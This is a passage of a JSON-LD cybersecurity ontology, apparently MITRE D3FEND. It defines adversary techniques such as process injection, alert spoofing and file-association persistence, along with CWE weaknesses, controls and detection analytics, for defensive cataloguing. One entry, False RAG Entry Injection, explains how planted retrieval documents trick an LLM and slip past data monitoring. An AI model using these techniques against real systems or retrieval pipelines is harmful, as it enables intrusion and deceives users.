      "d3f:kb-article": "## How it works\nA false online identity is created for the purposes of interacting with adversaries in a direct or indirect manner. This includes the associated email addresses, social media accounts, and other online communication profiles.\n\n## Considerations\n* Include phone numbers and online social profiles as well as automatically or manually responding to contact made to the persona to improve realism.\n* Continuously update and manage the decoy personas and online activity streams to ensure personas do not become stale and outdated.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DecoyPersonasForSafeguardingOnlineIdentityUsingDeception_"
        },
        {
          "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_Cymmetria,Inc."
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:User"
      },
      "rdfs:label": "Decoy Persona",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Nffe69843e93b409a9a886274670a9a49"
        }
      ]
    },
    {
      "@id": "_:Nffe69843e93b409a9a886274670a9a49",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:User"
      }
    },
    {
      "@id": "d3f:CWE-40",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-40",
      "d3f:definition": "The product accepts input that identifies a Windows UNC share ('\\\\UNC\\share\\name') that potentially redirects access to an unintended location or arbitrary file.",
      "rdfs:label": "Path Traversal: '\\\\UNC\\share\\name\\' (Windows UNC Share)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-36"
      }
    },
    {
      "@id": "d3f:DatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A single, implicitly structured data item in a table in a database.",
      "rdfs:label": "Database Record",
      "rdfs:seeAlso": "https://dbpedia.org/page/Row_(database)",
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:T1562.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1562.011",
      "d3f:definition": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.",
      "rdfs:label": "Spoof Security Alerting",
      "rdfs:subClassOf": {
        "@id": "d3f:T1562"
      }
    },
    {
      "@id": "d3f:NetworkPrinter",
      "@type": "owl:Class",
      "d3f:definition": "In computing, a network printer is a device that can be accessed over a network which makes a persistent representation of graphics or text, usually on paper. While most output is human-readable, bar code printers are an example of an expanded use for printers. The different types of printers include 3D printer, inkjet printer, laser printer, thermal printer, etc. Note that not all printers are networked; for those that are not, the digital information to be printed must be passed either by removable media or by directly connecting the printer to a computer (e.g., by USB).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Printer_(computing)"
      },
      "rdfs:label": "Network Printer",
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      }
    },
    {
      "@id": "d3f:T1546.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.001",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Change Default File Association",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N426fe97aa77a4d63bd542190deb0ad34"
        }
      ]
    },
    {
      "@id": "_:N426fe97aa77a4d63bd542190deb0ad34",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CCI-000029_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined limitations on the embedding of data types within other data types.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000029"
    },
    {
      "@id": "d3f:Q-Learning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-QL",
      "d3f:definition": "Q-learning is a model-free reinforcement learning algorithm to learn the value of an action in a particular state. It does not require a model of the environment (hence \"model-free\"), and it can handle problems with stochastic transitions and rewards without requiring adaptations.",
      "d3f:kb-article": "## References\nQ-learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Q-learning).",
      "rdfs:label": "Q-Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:ApplicationLayerLink",
      "@type": "owl:Class",
      "d3f:definition": "An Application Layer Link is a type of logical link that exists at the application layer of a network or system architecture.",
      "rdfs:label": "Application Layer Link",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:CWE-1247",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1247",
      "d3f:definition": "The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device.",
      "rdfs:label": "Improper Protection Against Voltage and Clock Glitches",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:T1616",
      "@type": "owl:Class",
      "d3f:attack-id": "T1616",
      "d3f:definition": "Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.",
      "rdfs:label": "Call Control - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Call Control"
    },
    {
      "@id": "d3f:provider",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x provider y: A provider y is an entity that supplies a service, system, or data resources to a dependent entity x.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05901034-n"
      },
      "rdfs:label": "provider",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/10696710-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:SMBFileCreateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is created if it does not already exist, failing if the file is already present. This operation strictly enforces new file creation.",
      "rdfs:label": "SMB File Create Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:HTTPConnectEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP CONNECT method is used to establish a tunnel to the server identified by the target resource.",
      "rdfs:label": "HTTP CONNECT Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:OTEmbeddedComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A ruggedized computational device, embedded in industrial control systems, designed to handle real-time tasks and environmental stressors common in OT.",
      "rdfs:label": "OT Embedded Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:EmbeddedComputer"
      }
    },
    {
      "@id": "d3f:REC-0008.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.03",
      "d3f:definition": "Adversaries correlate discovered component and software versions with public and private vulnerability sources to assemble a ready exploit catalog. Inputs include CPE/CVE mappings, vendor advisories, CWE-class weaknesses common to selected RTOS/middleware, FPGA IP core errata, cryptographic library issues, and hardware stepping errata that interact with thermal/power regimes. They mine leaked documents, demo code, bug trackers, and community forums; pivot from ground assets to flight by following shared libraries and tooling; and watch for lag between disclosure and patch deployment. Even when a vulnerability seems “ground-only,” it may expose build systems or update paths that ultimately control flight artifacts.",
      "rdfs:label": "Known Vulnerabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Known Vulnerabilities"
    },
    {
      "@id": "d3f:T1130",
      "@type": "owl:Class",
      "d3f:attack-id": "T1130",
      "d3f:definition": "Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.004",
      "rdfs:label": "Install Root Certificate",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1596.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.005",
      "d3f:definition": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)",
      "rdfs:label": "Scan Databases",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:AML.T0002.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0002.000",
      "d3f:definition": "Adversaries may collect public datasets to use in their operations.\nDatasets used by the victim organization or datasets that are representative of the data used by the victim organization may be valuable to adversaries.\nDatasets can be stored in cloud storage, or on victim-owned websites.\nSome datasets require the adversary to [Establish Accounts](/techniques/AML.T0021) for access.\n\nAcquired datasets help the adversary advance their operations, stage attacks,  and tailor attacks to the victim organization.",
      "rdfs:label": "Datasets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0002.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0002"
      },
      "skos:prefLabel": "Datasets"
    },
    {
      "@id": "d3f:process-parent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-parent y: The process y created the process x (directly) with a create process event.",
      "rdfs:label": "process-parent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-ancestor"
      },
      "skos:altLabel": "processParent"
    },
    {
      "@id": "d3f:CWE-235",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-235",
      "d3f:definition": "The product does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount.",
      "rdfs:label": "Improper Handling of Extra Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-233"
      }
    },
    {
      "@id": "d3f:PrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to gain higher-level permissions.",
      "d3f:enables": {
        "@id": "d3f:TA0004"
      },
      "rdfs:label": "Privilege Escalation Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N2025a8c60dc04635b28cd1f57a0c5338"
        }
      ]
    },
    {
      "@id": "_:N2025a8c60dc04635b28cd1f57a0c5338",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0004"
      }
    },
    {
      "@id": "d3f:CCI-001424_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system dynamically associates security attributes with organization-defined subjects in accordance with organization-defined security policies as information is created and combined.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001424"
    },
    {
      "@id": "d3f:CWE-6",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-6",
      "d3f:definition": "The J2EE application is configured to use an insufficient session ID length.",
      "rdfs:label": "J2EE Misconfiguration: Insufficient Session-ID Length",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-334"
      }
    },
    {
      "@id": "d3f:TA0003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.",
      "d3f:display-order": 3,
      "rdfs:label": "Persistence",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1093",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1093",
      "d3f:definition": "The product uses an unnecessarily complex internal representation for its data structures or interrelationships between those structures.",
      "rdfs:label": "Excessively Complex Data Representation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-000218_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, identifies information flows by data type specification and usage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000218"
    },
    {
      "@id": "d3f:AdaptiveResonanceTheoryClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ARTC",
      "d3f:definition": "Adaptive Resonance Theory (ART) Clustering is a neural network algorithm used for clustering data and is open to new learning (i.e. adaptive) without discarding the previous or the old information (i.e. resonance).",
      "d3f:kb-article": "## References\nGeeksforGeeks. (n.d.). Adaptive Resonance Theory (ART). [Link](https://www.geeksforgeeks.org/adaptive-resonance-theory-art/)",
      "rdfs:label": "Adaptive Resonance Theory Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ANN-basedClustering"
      }
    },
    {
      "@id": "d3f:AML.T0071",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0071",
      "d3f:definition": "Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When a RAG entry that includes the false document is retrieved, the LLM is tricked into treating part of the retrieved content as a false RAG result.\n\nBy including a false RAG document inside of a regular RAG entry, it bypasses data monitoring tools. It also prevents the document from being deleted directly.\n\nThe adversary may use discovered system keywords to learn how to instruct a particular LLM to treat content as a RAG entry. They may be able to manipulate the injected entry's metadata including document title, author, and creation date.",
      "rdfs:label": "False RAG Entry Injection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0071"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "False RAG Entry Injection"
    },
    {
      "@id": "d3f:GeometricMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GM",
      "d3f:definition": "The nth root of the product of the data values, where there are n of these. This measure is valid only for data that are measured absolutely on a strictly positive scale.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Geometric Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:T1588.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.003",
      "d3f:definition": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.",
      "rdfs:label": "Code Signing Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:MultivariateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MA",
      "d3f:definition": "Multivariate statistics encompasses the simultaneous observation and analysis of more than one outcome variable, i.e., multivariate random variables.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)",
      "rdfs:label": "Multivariate Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:Centroid-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CBC",
      "d3f:definition": "Centroid-based clustering organizes the data into non-hierarchical clusters, in contrast to hierarchical clustering defined below. K-means is the most widely-used centroid-based clustering algorithm. Centroid-based algorithms are efficient but sensitive to initial conditions and outliers.",
      "d3f:kb-article": "## References\nGoogle Developers. (n.d.). Clustering Algorithms. [Link](https://developers.google.com/machine-learning/clustering/clustering-algorithms)",
      "rdfs:label": "Centroid-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:WindowsCreateRemoteThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a thread that runs in the virtual address space of another process.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtCreateThreadEx"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread"
      },
      "rdfs:label": "Windows CreateRemoteThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateThread"
        },
        {
          "@id": "_:Nc1df7925c6b940e18f407a1b930eacfd"
        }
      ]
    },
    {
      "@id": "_:Nc1df7925c6b940e18f407a1b930eacfd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateThreadEx"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareVerificationEclypsium",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20200074086A1/en"
      },
      "d3f:kb-abstract": "Systems and methods are provided herein for monitoring and identifying potential security vulnerabilities in hardware and/or firmware of host devices.",
      "d3f:kb-author": "Yuriy Bulygin, Oleksandr Bazhaniuk",
      "d3f:kb-organization": "ECLYPSIUM , Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareVerification"
      },
      "d3f:kb-reference-title": "Methods and systems for hardware and firmware security monitoring",
      "rdfs:label": "Reference - Firmware Verification Eclypsium"
    },
    {
      "@id": "d3f:AnalyticalPurpose",
      "@type": "owl:Class",
      "rdfs:label": "Analytical Purpose",
      "rdfs:subClassOf": {
        "@id": "d3f:Goal"
      }
    },
    {
      "@id": "d3f:T1055.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1055.011",
      "d3f:definition": "Adversaries may inject malicious code into a process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.",
      "rdfs:label": "Extra Window Memory Injection",
      "rdfs:subClassOf": {
        "@id": "d3f:T1055"
      }
    },
    {
      "@id": "d3f:FTPListEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the contents of a directory on an FTP server are listed, providing metadata such as file names, sizes, and timestamps.",
      "rdfs:label": "FTP List Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FTPEvent"
      }
    },
    {
      "@id": "d3f:M1022",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:LocalFilePermissions"
      },
      "rdfs:label": "Restrict File and Directory Permissions"
    },
    {
      "@id": "d3f:RemoteTerminalSession",
      "@type": "owl:Class",
      "d3f:definition": "A remote terminal session is a session that provides a user access from one host to another host via a terminal.",
      "rdfs:label": "Remote Terminal Session",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:Kurtosis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KUR",
      "d3f:definition": "The measure of the \"fatness\" of the tails of a pmf or pdf. The fourth standardized moment of the distribution.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Probability distribution. [Link](https://en.wikipedia.org/wiki/Probability_distribution)",
      "rdfs:label": "Kurtosis",
      "rdfs:subClassOf": {
        "@id": "d3f:DistributionProperties"
      }
    },
    {
      "@id": "d3f:CWE-258",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-258",
      "d3f:definition": "Using an empty string as a password is insecure.",
      "rdfs:label": "Empty Password in Configuration File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-260"
        },
        {
          "@id": "d3f:CWE-521"
        }
      ]
    },
    {
      "@id": "d3f:Density-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DBC",
      "d3f:definition": "Density-based clustering connects areas of high example density into clusters. This allows for arbitrary-shaped distributions as long as dense areas can be connected.",
      "d3f:kb-article": "## References\nGoogle Developers. (n.d.). Clustering algorithms. [Link](https://developers.google.com/machine-learning/clustering/clustering-algorithms)",
      "rdfs:label": "Density-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTSP800-53ControlCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"
      },
      "d3f:version": 3,
      "rdfs:label": "NIST SP 800-53 R3",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"
      }
    },
    {
      "@id": "d3f:SerializationFunction",
      "@type": "owl:Class",
      "d3f:definition": "A function which has an operation that serializes data.",
      "rdfs:label": "Serialization Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-007%3ANetworkShareConnectionRemoval_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-007/"
      },
      "d3f:kb-abstract": "Adversaries may use network shares to exfiltrate data; they will then remove the shares to cover their tracks. This analytic looks for the removal of network shares via the command line, which is otherwise a rare event.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-007: Network Share Connection Removal",
      "rdfs:label": "Reference - CAR-2020-11-007: Network Share Connection Removal - MITRE"
    },
    {
      "@id": "d3f:T1070.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.005",
      "d3f:definition": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\\\system\\share /delete</code> command. (Citation: Technet Net Use)",
      "d3f:unmounts": {
        "@id": "d3f:NetworkFileShareResource"
      },
      "rdfs:label": "Network Share Connection Removal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N3d0261f7a1e145f88e8f3665ac9a8804"
        }
      ]
    },
    {
      "@id": "_:N3d0261f7a1e145f88e8f3665ac9a8804",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:unmounts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkFileShareResource"
      }
    },
    {
      "@id": "d3f:access-mediated-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x access-mediated-by y: The entity or resource x has its access regulated, controlled, or facilitated by entity y, which acts as an intermediary or gatekeeper to enforce access control policies.",
      "owl:inverseOf": {
        "@id": "d3f:mediates-access-to"
      },
      "rdfs:label": "access-mediated-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-ProcessesSpawningCmd.exe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-02-003/"
      },
      "d3f:kb-abstract": "The Windows Command Prompt (cmd.exe) is a utility that provides a command line interface to Windows operating systems. It provides the ability to run additional programs and also has several built-in commands such as dir, copy, mkdir, and type, as well as batch scripts (.bat). Typically, when a user runs a command prompt, the parent process is explorer.exe or another instance of the prompt. There may be automated programs, logon scripts, or administrative tools that launch instances of the command prompt in order to run scripts or other built-in commands. Spawning the process cmd.exe from certain parents may be more indicative of malice. For example, if Adobe Reader or Outlook launches a command shell, this may suggest that a malicious document has been loaded and should be investigated. Thus, by looking for abnormal parent processes of cmd.exe, it may be possible to detect adversaries.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-02-003: Processes Spawning cmd.exe",
      "rdfs:label": "Reference - CAR-2013-02-003: Processes Spawning cmd.exe - MITRE"
    },
    {
      "@id": "d3f:Reference-End-to-endCertificatePinning",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9847992B2/en?q=certificate+pinning&oq=certificate+pinning"
      },
      "d3f:kb-abstract": "Some embodiments implement end-to-end certificate pinning for content intake from various content providers and for content distribution to various end users. To ensure secure retrieval of content provider content, the content distributor pins the content provider to one or more certificate authorities.",
      "d3f:kb-author": "Tin Zaw, Reed Morrison, Robert J. Peters",
      "d3f:kb-organization": "Verizon Digital Media Services Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:CertificatePinning"
      },
      "d3f:kb-reference-title": "End-to-end Certificate Pinning",
      "rdfs:label": "Reference - End-to-end certificate pinning"
    },
    {
      "@id": "d3f:TransducerSensor",
      "@type": "owl:Class",
      "d3f:definition": "A Transducer Sensor converts physical signals into digital data for monitoring purposes.",
      "rdfs:label": "Transducer Sensor",
      "rdfs:subClassOf": {
        "@id": "d3f:Sensor"
      }
    },
    {
      "@id": "d3f:ImageDataSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An image data segment (often denoted .data) is a portion of an object file that contains initialized static variables, that is, global variables and static local variables. The size of this segment is determined by the size of the values in the program's source code, and does not change at run time. This segmenting of the memory space into discrete blocks with specific tasks carried over into the programming languages of the day and the concept is still widely in use within modern programming languages.",
      "rdfs:label": "Image Data Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ProcessDataSegment"
        },
        {
          "@id": "dbr:Data_segment"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSegment"
      }
    },
    {
      "@id": "d3f:T1213.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:WebFileResource"
      },
      "d3f:attack-id": "T1213.002",
      "d3f:definition": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:",
      "rdfs:label": "Sharepoint",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1213"
        },
        {
          "@id": "_:Nb188466300ed417db33f1aa076ab16ce"
        }
      ]
    },
    {
      "@id": "_:Nb188466300ed417db33f1aa076ab16ce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebFileResource"
      }
    },
    {
      "@id": "d3f:CCI-000381_v2022-04-05",
